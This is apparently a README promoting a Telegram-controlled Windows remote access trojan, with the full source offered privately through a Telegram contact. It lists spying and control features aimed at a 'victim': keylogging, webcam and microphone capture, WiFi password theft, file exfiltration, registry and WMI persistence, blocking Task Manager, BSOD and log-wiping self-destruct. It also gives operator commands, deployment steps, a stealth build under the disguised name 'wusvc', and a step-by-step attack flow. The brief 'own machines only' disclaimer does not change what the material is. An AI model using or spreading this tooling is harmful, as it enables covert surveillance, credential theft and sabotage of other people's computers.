┌──(root💀bypass)-[~]
└─# cat /etc/telegram-rat/about ─────────────────────────────────
system:
name: "TELEGRAM_RAT"
role: "remote access / control panel"
engine: "telegram bot api — no ports, no c2 server"
shell: "windows — fully hidden"
uptime: "until you say stop"
executes:
- full shell — cmd · powershell · python
- capture — screen · webcam · microphone
- keylogger — background keystroke logging
- files — search · download · upload
- recon — system info · processes · wifi · clipboard
- persistence — registry · startup · tasks · wmi
- power — lock · shutdown · restart · logout · bsod
creed:
"one telegram message is all it takes."
[ STATUS ]: ONLINE — PANEL v5.0 / CLIENT v4.0 |
|
# ── The complete source code (server + client) is NOT public ──
# ── Contact the developer on Telegram to get the full package ──
╔══════════════════════════════════════════════╗
║ ║
║ ☠️ FULL SOURCE CODE — SERVER + CLIENT ║
║ ║
║ 📱 Telegram: @Its_Bypass ║
║ ║
║ Send a message → receive the package ║
╚══════════════════════════════════════════════╝
# → https://t.me/Its_Bypass🇮🇷 ابزار کنترل از راه دور مبتنی بر تلگرام — پنل مدیریت کامل + کلاینت مخفی.
⚠️ فقط برای سیستمهای خودت و در محیط کنترلشده تست کن؛ نصب روی سیستم دیگران بدون اجازه جرم است و مسئولیتش با خودته.
|
|
| ⟦ capability ⟧ | ⟦ details ⟧ |
|---|---|
| 🖥 Full Shell | run any command via CMD, PowerShell, or raw Python — output streamed back to the admin |
| 📸 Screen Capture | instant screenshot of the victim display (pyautogui + PowerShell fallback) |
| 📷 Webcam | capture photo from the target's camera (OpenCV + DirectShow fallback) |
| 🎤 Microphone | record audio from the target mic (1–30 seconds) |
| ⌨️ Keylogger | live keystroke logging in background — dumped to file on demand |
| 📋 Clipboard | read the current clipboard contents |
| 📂 File Ops | search files by extension, download any file, upload files to the target |
| 🌐 WiFi Recon | extract every saved WiFi password via netsh wlan |
| 🧠 System Recon | OS · CPU · GPU · RAM · disk · antivirus · public/local IP · country · username |
| 📊 Processes | list running processes sorted by memory, kill any PID |
| 💾 Persistence | registry (HKCU/HKLM) · startup folders · scheduled tasks · WMI event subscription |
| 🔐 Password | change the Windows user password remotely |
| 🔒 Lockdown | block Task Manager, CMD, Regedit, Run, Control Panel |
| ⚡ Power | lock · shutdown · restart · logout · hibernate · BSOD |
| 💬 MessageBox | pop any message on the victim screen |
| 🗑 Self-Destruct | remove all persistence, wipe logs, delete itself |
Control Panel (run by the admin) —
python server.py
| command | action |
|---|---|
/start /help |
full command map + online/offline stats |
/clients /list |
dashboard of every registered client (🟢/🔴) |
/select <id> |
lock on a target (also via inline keyboard) |
/unselect |
release the current target |
/info |
full details of the selected client |
/delete <id> |
remove a client from the database |
/mute <id> |
silence a client's notifications |
/note <id> <text> |
attach a note to a client |
/cmd whoami |
forward any command straight to the selected client |
| inline buttons | Shell · Screenshot · Clipboard · Files · Keys · Webcam · Kill · Shutdown · Restart |
| 📎 file/photo | send any file or image to the selected client |
Stealth payload (runs on the target) —
python client.py
| command | action |
|---|---|
/help /start |
client status + command reference |
/list |
online status ping |
/info |
full system recon (OS · CPU · GPU · RAM · disk · AV · location) |
/cmd <cmd> |
execute in CMD |
/ps <cmd> |
execute in PowerShell |
/python <code> |
execute raw Python on the target |
/screenshot |
capture the screen |
/cam |
capture webcam photo |
/mic <sec> |
record microphone (1–30s) |
/keys |
dump keylogger data |
/clipboard |
read clipboard |
/processes |
list running processes |
/files <.ext> |
search files by extension (up to 300) |
/desktop |
list recent desktop files |
/downloads |
list recent downloads |
/get <path> |
download a file from the target |
/upload <path> |
upload a file to the target |
/wifi |
extract saved WiFi passwords |
/persistence |
install startup persistence (6 methods) |
/uninstall |
remove all persistence traces |
/changepass <pass> |
change Windows password |
/blockapps |
block TaskMgr · CMD · Regedit · Run · Control Panel |
/unblockapps |
re-enable everything |
/msg <text> |
pop a MessageBox on the target |
/kill <pid> |
kill a process by PID |
/lock |
lock the workstation |
/shutdown |
shut down the system |
/restart |
restart the system |
/logout |
log out the user |
/hibernate |
hibernate the system |
/bsod |
trigger the Blue Screen of Death |
/selfdestruct |
wipe logs, remove persistence, self-delete |
# ── 1) Get the source code ──────────────────────────────
# 📱 Contact @Its_Bypass on Telegram → receive server.py + client.py
# ── 2) Install requirements (server + client) ───────────
pip install pyTelegramBotAPI requests pynput pyautogui opencv-python sounddevice scipy pywin32
# ── 3) Configure ────────────────────────────────────────
# create a bot with @BotFather → copy the token
# open server.py → set TOKEN + ADMIN_ID
# open client.py → set TOKEN + ADMIN_ID
# ── 4) Run the control panel ────────────────────────────
python server.py
# ── 5) Deploy the client on the target machine ──────────
python client.py
# ── 6) Optional: build a stealth .exe with PyInstaller ──
pip install pyinstaller
pyinstaller --onefile --noconsole --name wusvc client.py# ── Typical attack flow ─────────────────────────────────
# 1. client registers itself → admin gets 🟢 CLIENT ONLINE
# 2. /clients → see every connected machine
# 3. /select <id> → lock the target
# 4. /info → full recon (OS, IP, AV...)
# 5. /screenshot → see what they see
# 6. /keys → read everything they type
# 7. /wifi → grab saved passwords
# 8. /persistence → survive reboot
# 9. /shutdown or /bsod → end of story@@ ./usage_policy.sh @@
+ control machines you own, from anywhere in the world
+ recover your own passwords and files remotely
+ test your own security posture and patch your gaps
- deploy on machines you don't own
- spy on people without consent
- forget that a RAT is a weapon too| ⟦ module ⟧ | ⟦ delivers ⟧ |
|---|---|
control panel |
client dashboard · selection · inline keyboards · notes · mute · delete |
command engine |
CMD / PowerShell / Python execution with output streaming |
capture |
screenshot · webcam · microphone recording |
keylogger |
silent background keystroke capture + on-demand dump |
file ops |
extension search · exfiltration · upload to target |
recon |
system info · processes · wifi passwords · clipboard · geolocation |
persistence |
registry · startup folders · scheduled tasks · WMI subscriptions |
lockdown |
block Task Manager / CMD / Regedit / Run / Control Panel |
power |
lock · shutdown · restart · logout · hibernate · BSOD |
stealth |
hidden console · silent subprocess · hidden directories · fake name |
self-destruct |
full trace removal + self-deletion via batch script |
|
@Its_Bypass — get the code |
BYPASS-CODEE |
@BYPASS_CODEE |
bypass_codee |